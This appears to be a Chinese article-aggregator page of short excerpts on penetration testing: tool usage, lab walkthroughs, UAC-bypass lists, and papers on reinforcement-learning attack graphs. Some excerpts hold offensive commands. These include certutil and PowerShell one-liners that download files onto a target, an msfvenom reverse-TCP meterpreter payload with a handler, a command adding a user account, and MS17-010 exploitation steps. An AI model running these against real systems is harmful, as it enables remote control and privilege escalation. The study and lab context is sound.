ICode9

精准搜索请尝试: 精确搜索
  • python渗透测试之argparse的使用2022-09-08 14:30:30

    一、前言   最近研究了python渗透测试,在做渗透测试时不可少的一个模块就是argparse(python3)/optparse(python2);发现大家所提供的一些关于渗透测试的代码以及资料里面大多都用的是   optparse(python2),但是optparse在python2.7以后就被放弃且不再维护更新了,所以对于python3的用户来

  • 渗透测试的基本流程2022-09-05 22:32:35

    渗透测试的基本流程主要分为以下几步:  1. 明确目标  2. 信息收集  3. 漏洞探测(挖掘)  4. 漏洞验证(利用)  5. 提升权限   6. 清除痕迹   7. 事后信息分析    8. 编写渗透测试报告  1.1 明确目标  主要是确定需要渗透资产范围; 确定规则,如怎么去渗透; 确定需求,

  • DoubleTrouble 靶机渗透2022-07-27 18:34:17

    渗透思路 扫描服务-->扫描目录-->解密隐写图片-->获得账号密码-->执行RCE exp-->反弹shell-->使用awk提权 前期准备 靶机IP:192.168.11.136 信息收集 Nmap扫描端口信息 nmap -A -T4 192.168.11.136 访问站点发现是 qdPM CMS,此CMS存在较多漏洞,但是要用RCE的话需要知道账号密码,

  • 内网渗透 - 权限提升2022-07-24 20:34:11

    Windows BypassUAC 常用方法 使用IFileOperation COM接口 使用Wusa.exe的extract选项 远程注入SHELLCODE 到傀儡进程 DLL劫持,劫持系统的DLL文件 eventvwr.exe and registry hijacking sdclt.exe SilentCleanup wscript.exe cmstp.exe 修改环境变量,劫持高权限.Net程序 修改注册表H

  • 渗透测试学习Week3-渗透测试项目实训(一)2022-07-18 18:35:27

    渗透测试项目实训 by 奇安信 (南航大二下暑期卓越班课程) 讲师:zzf 在内网进行 项目初始信息 三个域名 www.qianxin.com blog.qianxin.com news.qianxin.com 渗透项目从这三个域名开始着手,企业内部环境需要自行探索 环境拓扑 两台操作机,右侧为靶机 实训任务 一 登录www.qianxin.com

  • 内网渗透学习-windows认证2022-07-18 12:04:47

    内网渗透学习-windows认证 windows本地认证 windows网络认证 kerberos域认证 前言: 进入公司实习期间,参与了护网红队的工作,见识了师傅们逆天强悍的操作,深刻认识到了要学的还有很多很多很多,所以假期着手用空闲时间整理一个内网学习系列,针对内网渗透做一个总结。 本章内容是Windows

  • 渗透测试面试题(二)2022-07-13 13:03:16

    一,登录框处渗透测试       参考链接:http://www.360doc.com/content/22/0204/22/77981587_1015993062.shtml

  • 关于渗透测试的优缺点,你知道吗?2022-07-02 15:04:26

    关于渗透测试的优缺点,知名白帽黑客、东方联盟创始人郭盛华曾公开透露:“渗透测试是作为深入的——使用定制的渗透测试框架对你的系统进行彻底的测试 ——以发现组织内隐藏的漏洞。 渗透测试的优点可能包括: 1、由专业的渗透测试人员团队深入了解和测试您的系统。 2、为满足您组织的

  • 在强化学习中使用网络地形进行渗透测试2022-06-30 11:46:10

    目录一、介绍二、RL渗透测试三、实验结果四、结论 一、介绍 RL应用于渗透测试的攻击图之中,但是训练有素的代理并不能反映现实情况,因为攻击图缺乏对于网络地形的描述。目前通常使用CVSS及其组件构建攻击图,但是通过完全依赖抽象化,网络表示可能偏向于漏洞,而不是攻击者如何计划或执行

  • 使用攻击图的强化学习发现渗透路径2022-06-30 11:45:51

    目录一、介绍二、RL三、MDP构建攻击图四、实验评估五、总结 一、介绍 文章提出了一种在攻击图中发现渗透路径的RL方法,在攻击图的动态模型中对基于服务的防御性网络结构进行建模,发现最优的N条攻击路径。 二、RL RL通过与环境交互来学习,描述了一组近似动态规划的求解方法,环境通常通

  • 自主安全分析和渗透测试2022-06-29 22:31:46

    目录自主安全分析和渗透测试一、概要二、流程三、实验评估四、总结 自主安全分析和渗透测试 一、概要 本文提出了一个自主的安全分析和渗透测试框架\((ASAP)\),它使用攻击图来创建网络中的安全威胁到可能的攻击路径的映射。框架利用: 基于\(DQN\)的最先进的强化学习算法来执行\(PT\)

  • 渗透测试中常用Windows命令2022-06-18 17:02:31

    ipconfig /all 获取域名、IP地址、DHCP服务器、网关、MAC地址、主机名 net time /domain 查看域名、时间 net view /domain 查看域内所有共享 net view ip 查看对方局域网内开启了哪些共享 net config workstation 查看域名、机器名等 net user 用户名 密码 /add 建立用户 net use

  • 阅读小记——记录自己的阅读进度2022-06-15 19:31:57

    《kali渗透测试实践教程》 《大话数据结构》 《图解HTTP》 《黑客免杀攻防》 《欺骗的艺术》 《黑客攻防技术宝典Web实战篇》 《黑客大揭秘 金源渗透测试》 《Web前端黑客技术揭秘》

  • 渗透测试人员文件下载的主要方法2022-06-11 13:01:02

    目标机器为Windows: Certutil.exe certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]     Powershell powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')     目标机器为Linux

  • 渗透win7笔记2022-06-08 14:04:31

    实验环境: 靶机:Win7(关闭防火墙,未装永恒之蓝漏洞补丁)192.168.88.135 渗透设备:kali 192.168.88.133(渗透)windows 192.168.88.134(远程登陆验证) 渗透步骤: 进入渗透环境,命令msfconsole 查询永恒之蓝对应的漏洞(ms17-010),命令search ms17-010 Matching Modules ================ # Name

  • 20211914涂可新 2021-2022-2 《网络攻防实践》实践十一报告2022-05-29 23:32:00

    20211914涂可新 2021-2022-2 《网络攻防实践》实践十一报告 1.实践内容 总结一下本周学习内容并介绍下实践内容,不要复制粘贴 2.实践过程 2.1web浏览器渗透攻击 任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。 实验步骤: ①选择使

  • 内网渗透2022-05-29 01:00:29

    判断是否是虚拟机 1.通过公网IP地址-->XX云上服务器..没有内网 2.通过是否安装Vmware Tools工具..判断当前主机是否是一台ESXI上的虚拟机 -->扫描该公网C段资产-->判断哪台服务器是Esxi/vmware vpshere主机-->针对虚拟化服务器进行漏洞攻击 -->拿下虚拟化服务器-->控制所有主机

  • 20212810 2021-2022-2 《网络攻防实践》实践十一报告2022-05-28 21:33:34

    20212810 2021-2022-2 《网络攻防实践》实践十一报告 一.实践内容 1.Web浏览器渗透攻击实验 任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。 2.取证分析实践—网页木马攻击场景分析 3.攻防对抗实践—web浏览器渗透攻击攻防 攻击

  • 渗透.md2022-05-26 10:33:38

    shell 目录shell运行时隐藏golang程序自己的cmd窗口: 运行时隐藏golang程序自己的cmd窗口: go build -ldflags -H=windowsgui *.go

  • DC-2渗透记录2022-05-19 08:33:50

    信息收集 对靶机进行扫描 nmap -sV -A -T4 192.168.1.11 可以看到主机开放了80端口 (这里有故意小坑,需要手动配置hosts文件,靶机ip对应的dc-2域名里添加进去) 访问发现是wordPress的网站 发现 flag1 提示用cewl 生成字典 cewl http://dc-2/index.php/flag/ > pwd.txt 使用wpscan

  • Metasploit2022-05-19 08:03:10

    Metasploit(MSF)简介 Metasploit是一个免费的、可下载的框架,通过他可以很容易地获取、开发并对计算机软件漏洞实施攻击。他本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D.Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。彷佛一夜之间,任何人都可以成为

  • 渗透:aircrack-ng2022-05-18 15:33:50

    ircrack- NG是一个完整的工具来评估Wi-Fi网络安全套件,功能包括: 监控:数据包捕获和导出数据到文本文件,以供第三方工具进一步处理。 攻击:通过数据包注入回放攻击,去认证,伪造接入点等。 测试:检查WiFi卡和驱动程序的能力(捕捉和注入)。 破解:WEP 和 WPA PSK(WPA 1和2)。 所有的工具都是命

  • 工具篇 | 渗透测试必备浏览器插件分享2022-05-18 08:34:17

    前言工欲善其事,必先利其器,方便好用的浏览器插件可以大大提高我们渗透测试的效率。以下是笔者比较常用的一些插件推荐,其中包含渗透测试、信息收集、代理、加密解密等功能。 Proxy SwitchyOmega 轻松快捷地管理和切换多个代理设置,常用于Google Chrome。 User-Agent Switcher 该插

  • 网络与系统攻防技术|实验六 Metasploit攻击渗透实践2022-05-16 00:03:58

    网络与系统攻防技术 实验六 Metasploit攻击渗透实践 dky 20192414 袁浩然 实践目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 一个主动攻击实践,尽量使用最新的类似漏洞; 一个针对浏览器的攻击,尽量使用最新的类似漏洞; 一个针对客

  • 红日靶场(内网渗透)——22022-05-14 21:01:54

    1.后渗透。 之前我们已经将小马上传,在这里用webshell进行进一步渗透。 1)基于msf 利用msf生成exe,并上传。 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe       use exploit/multi/handler set payload windows/x64/me

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有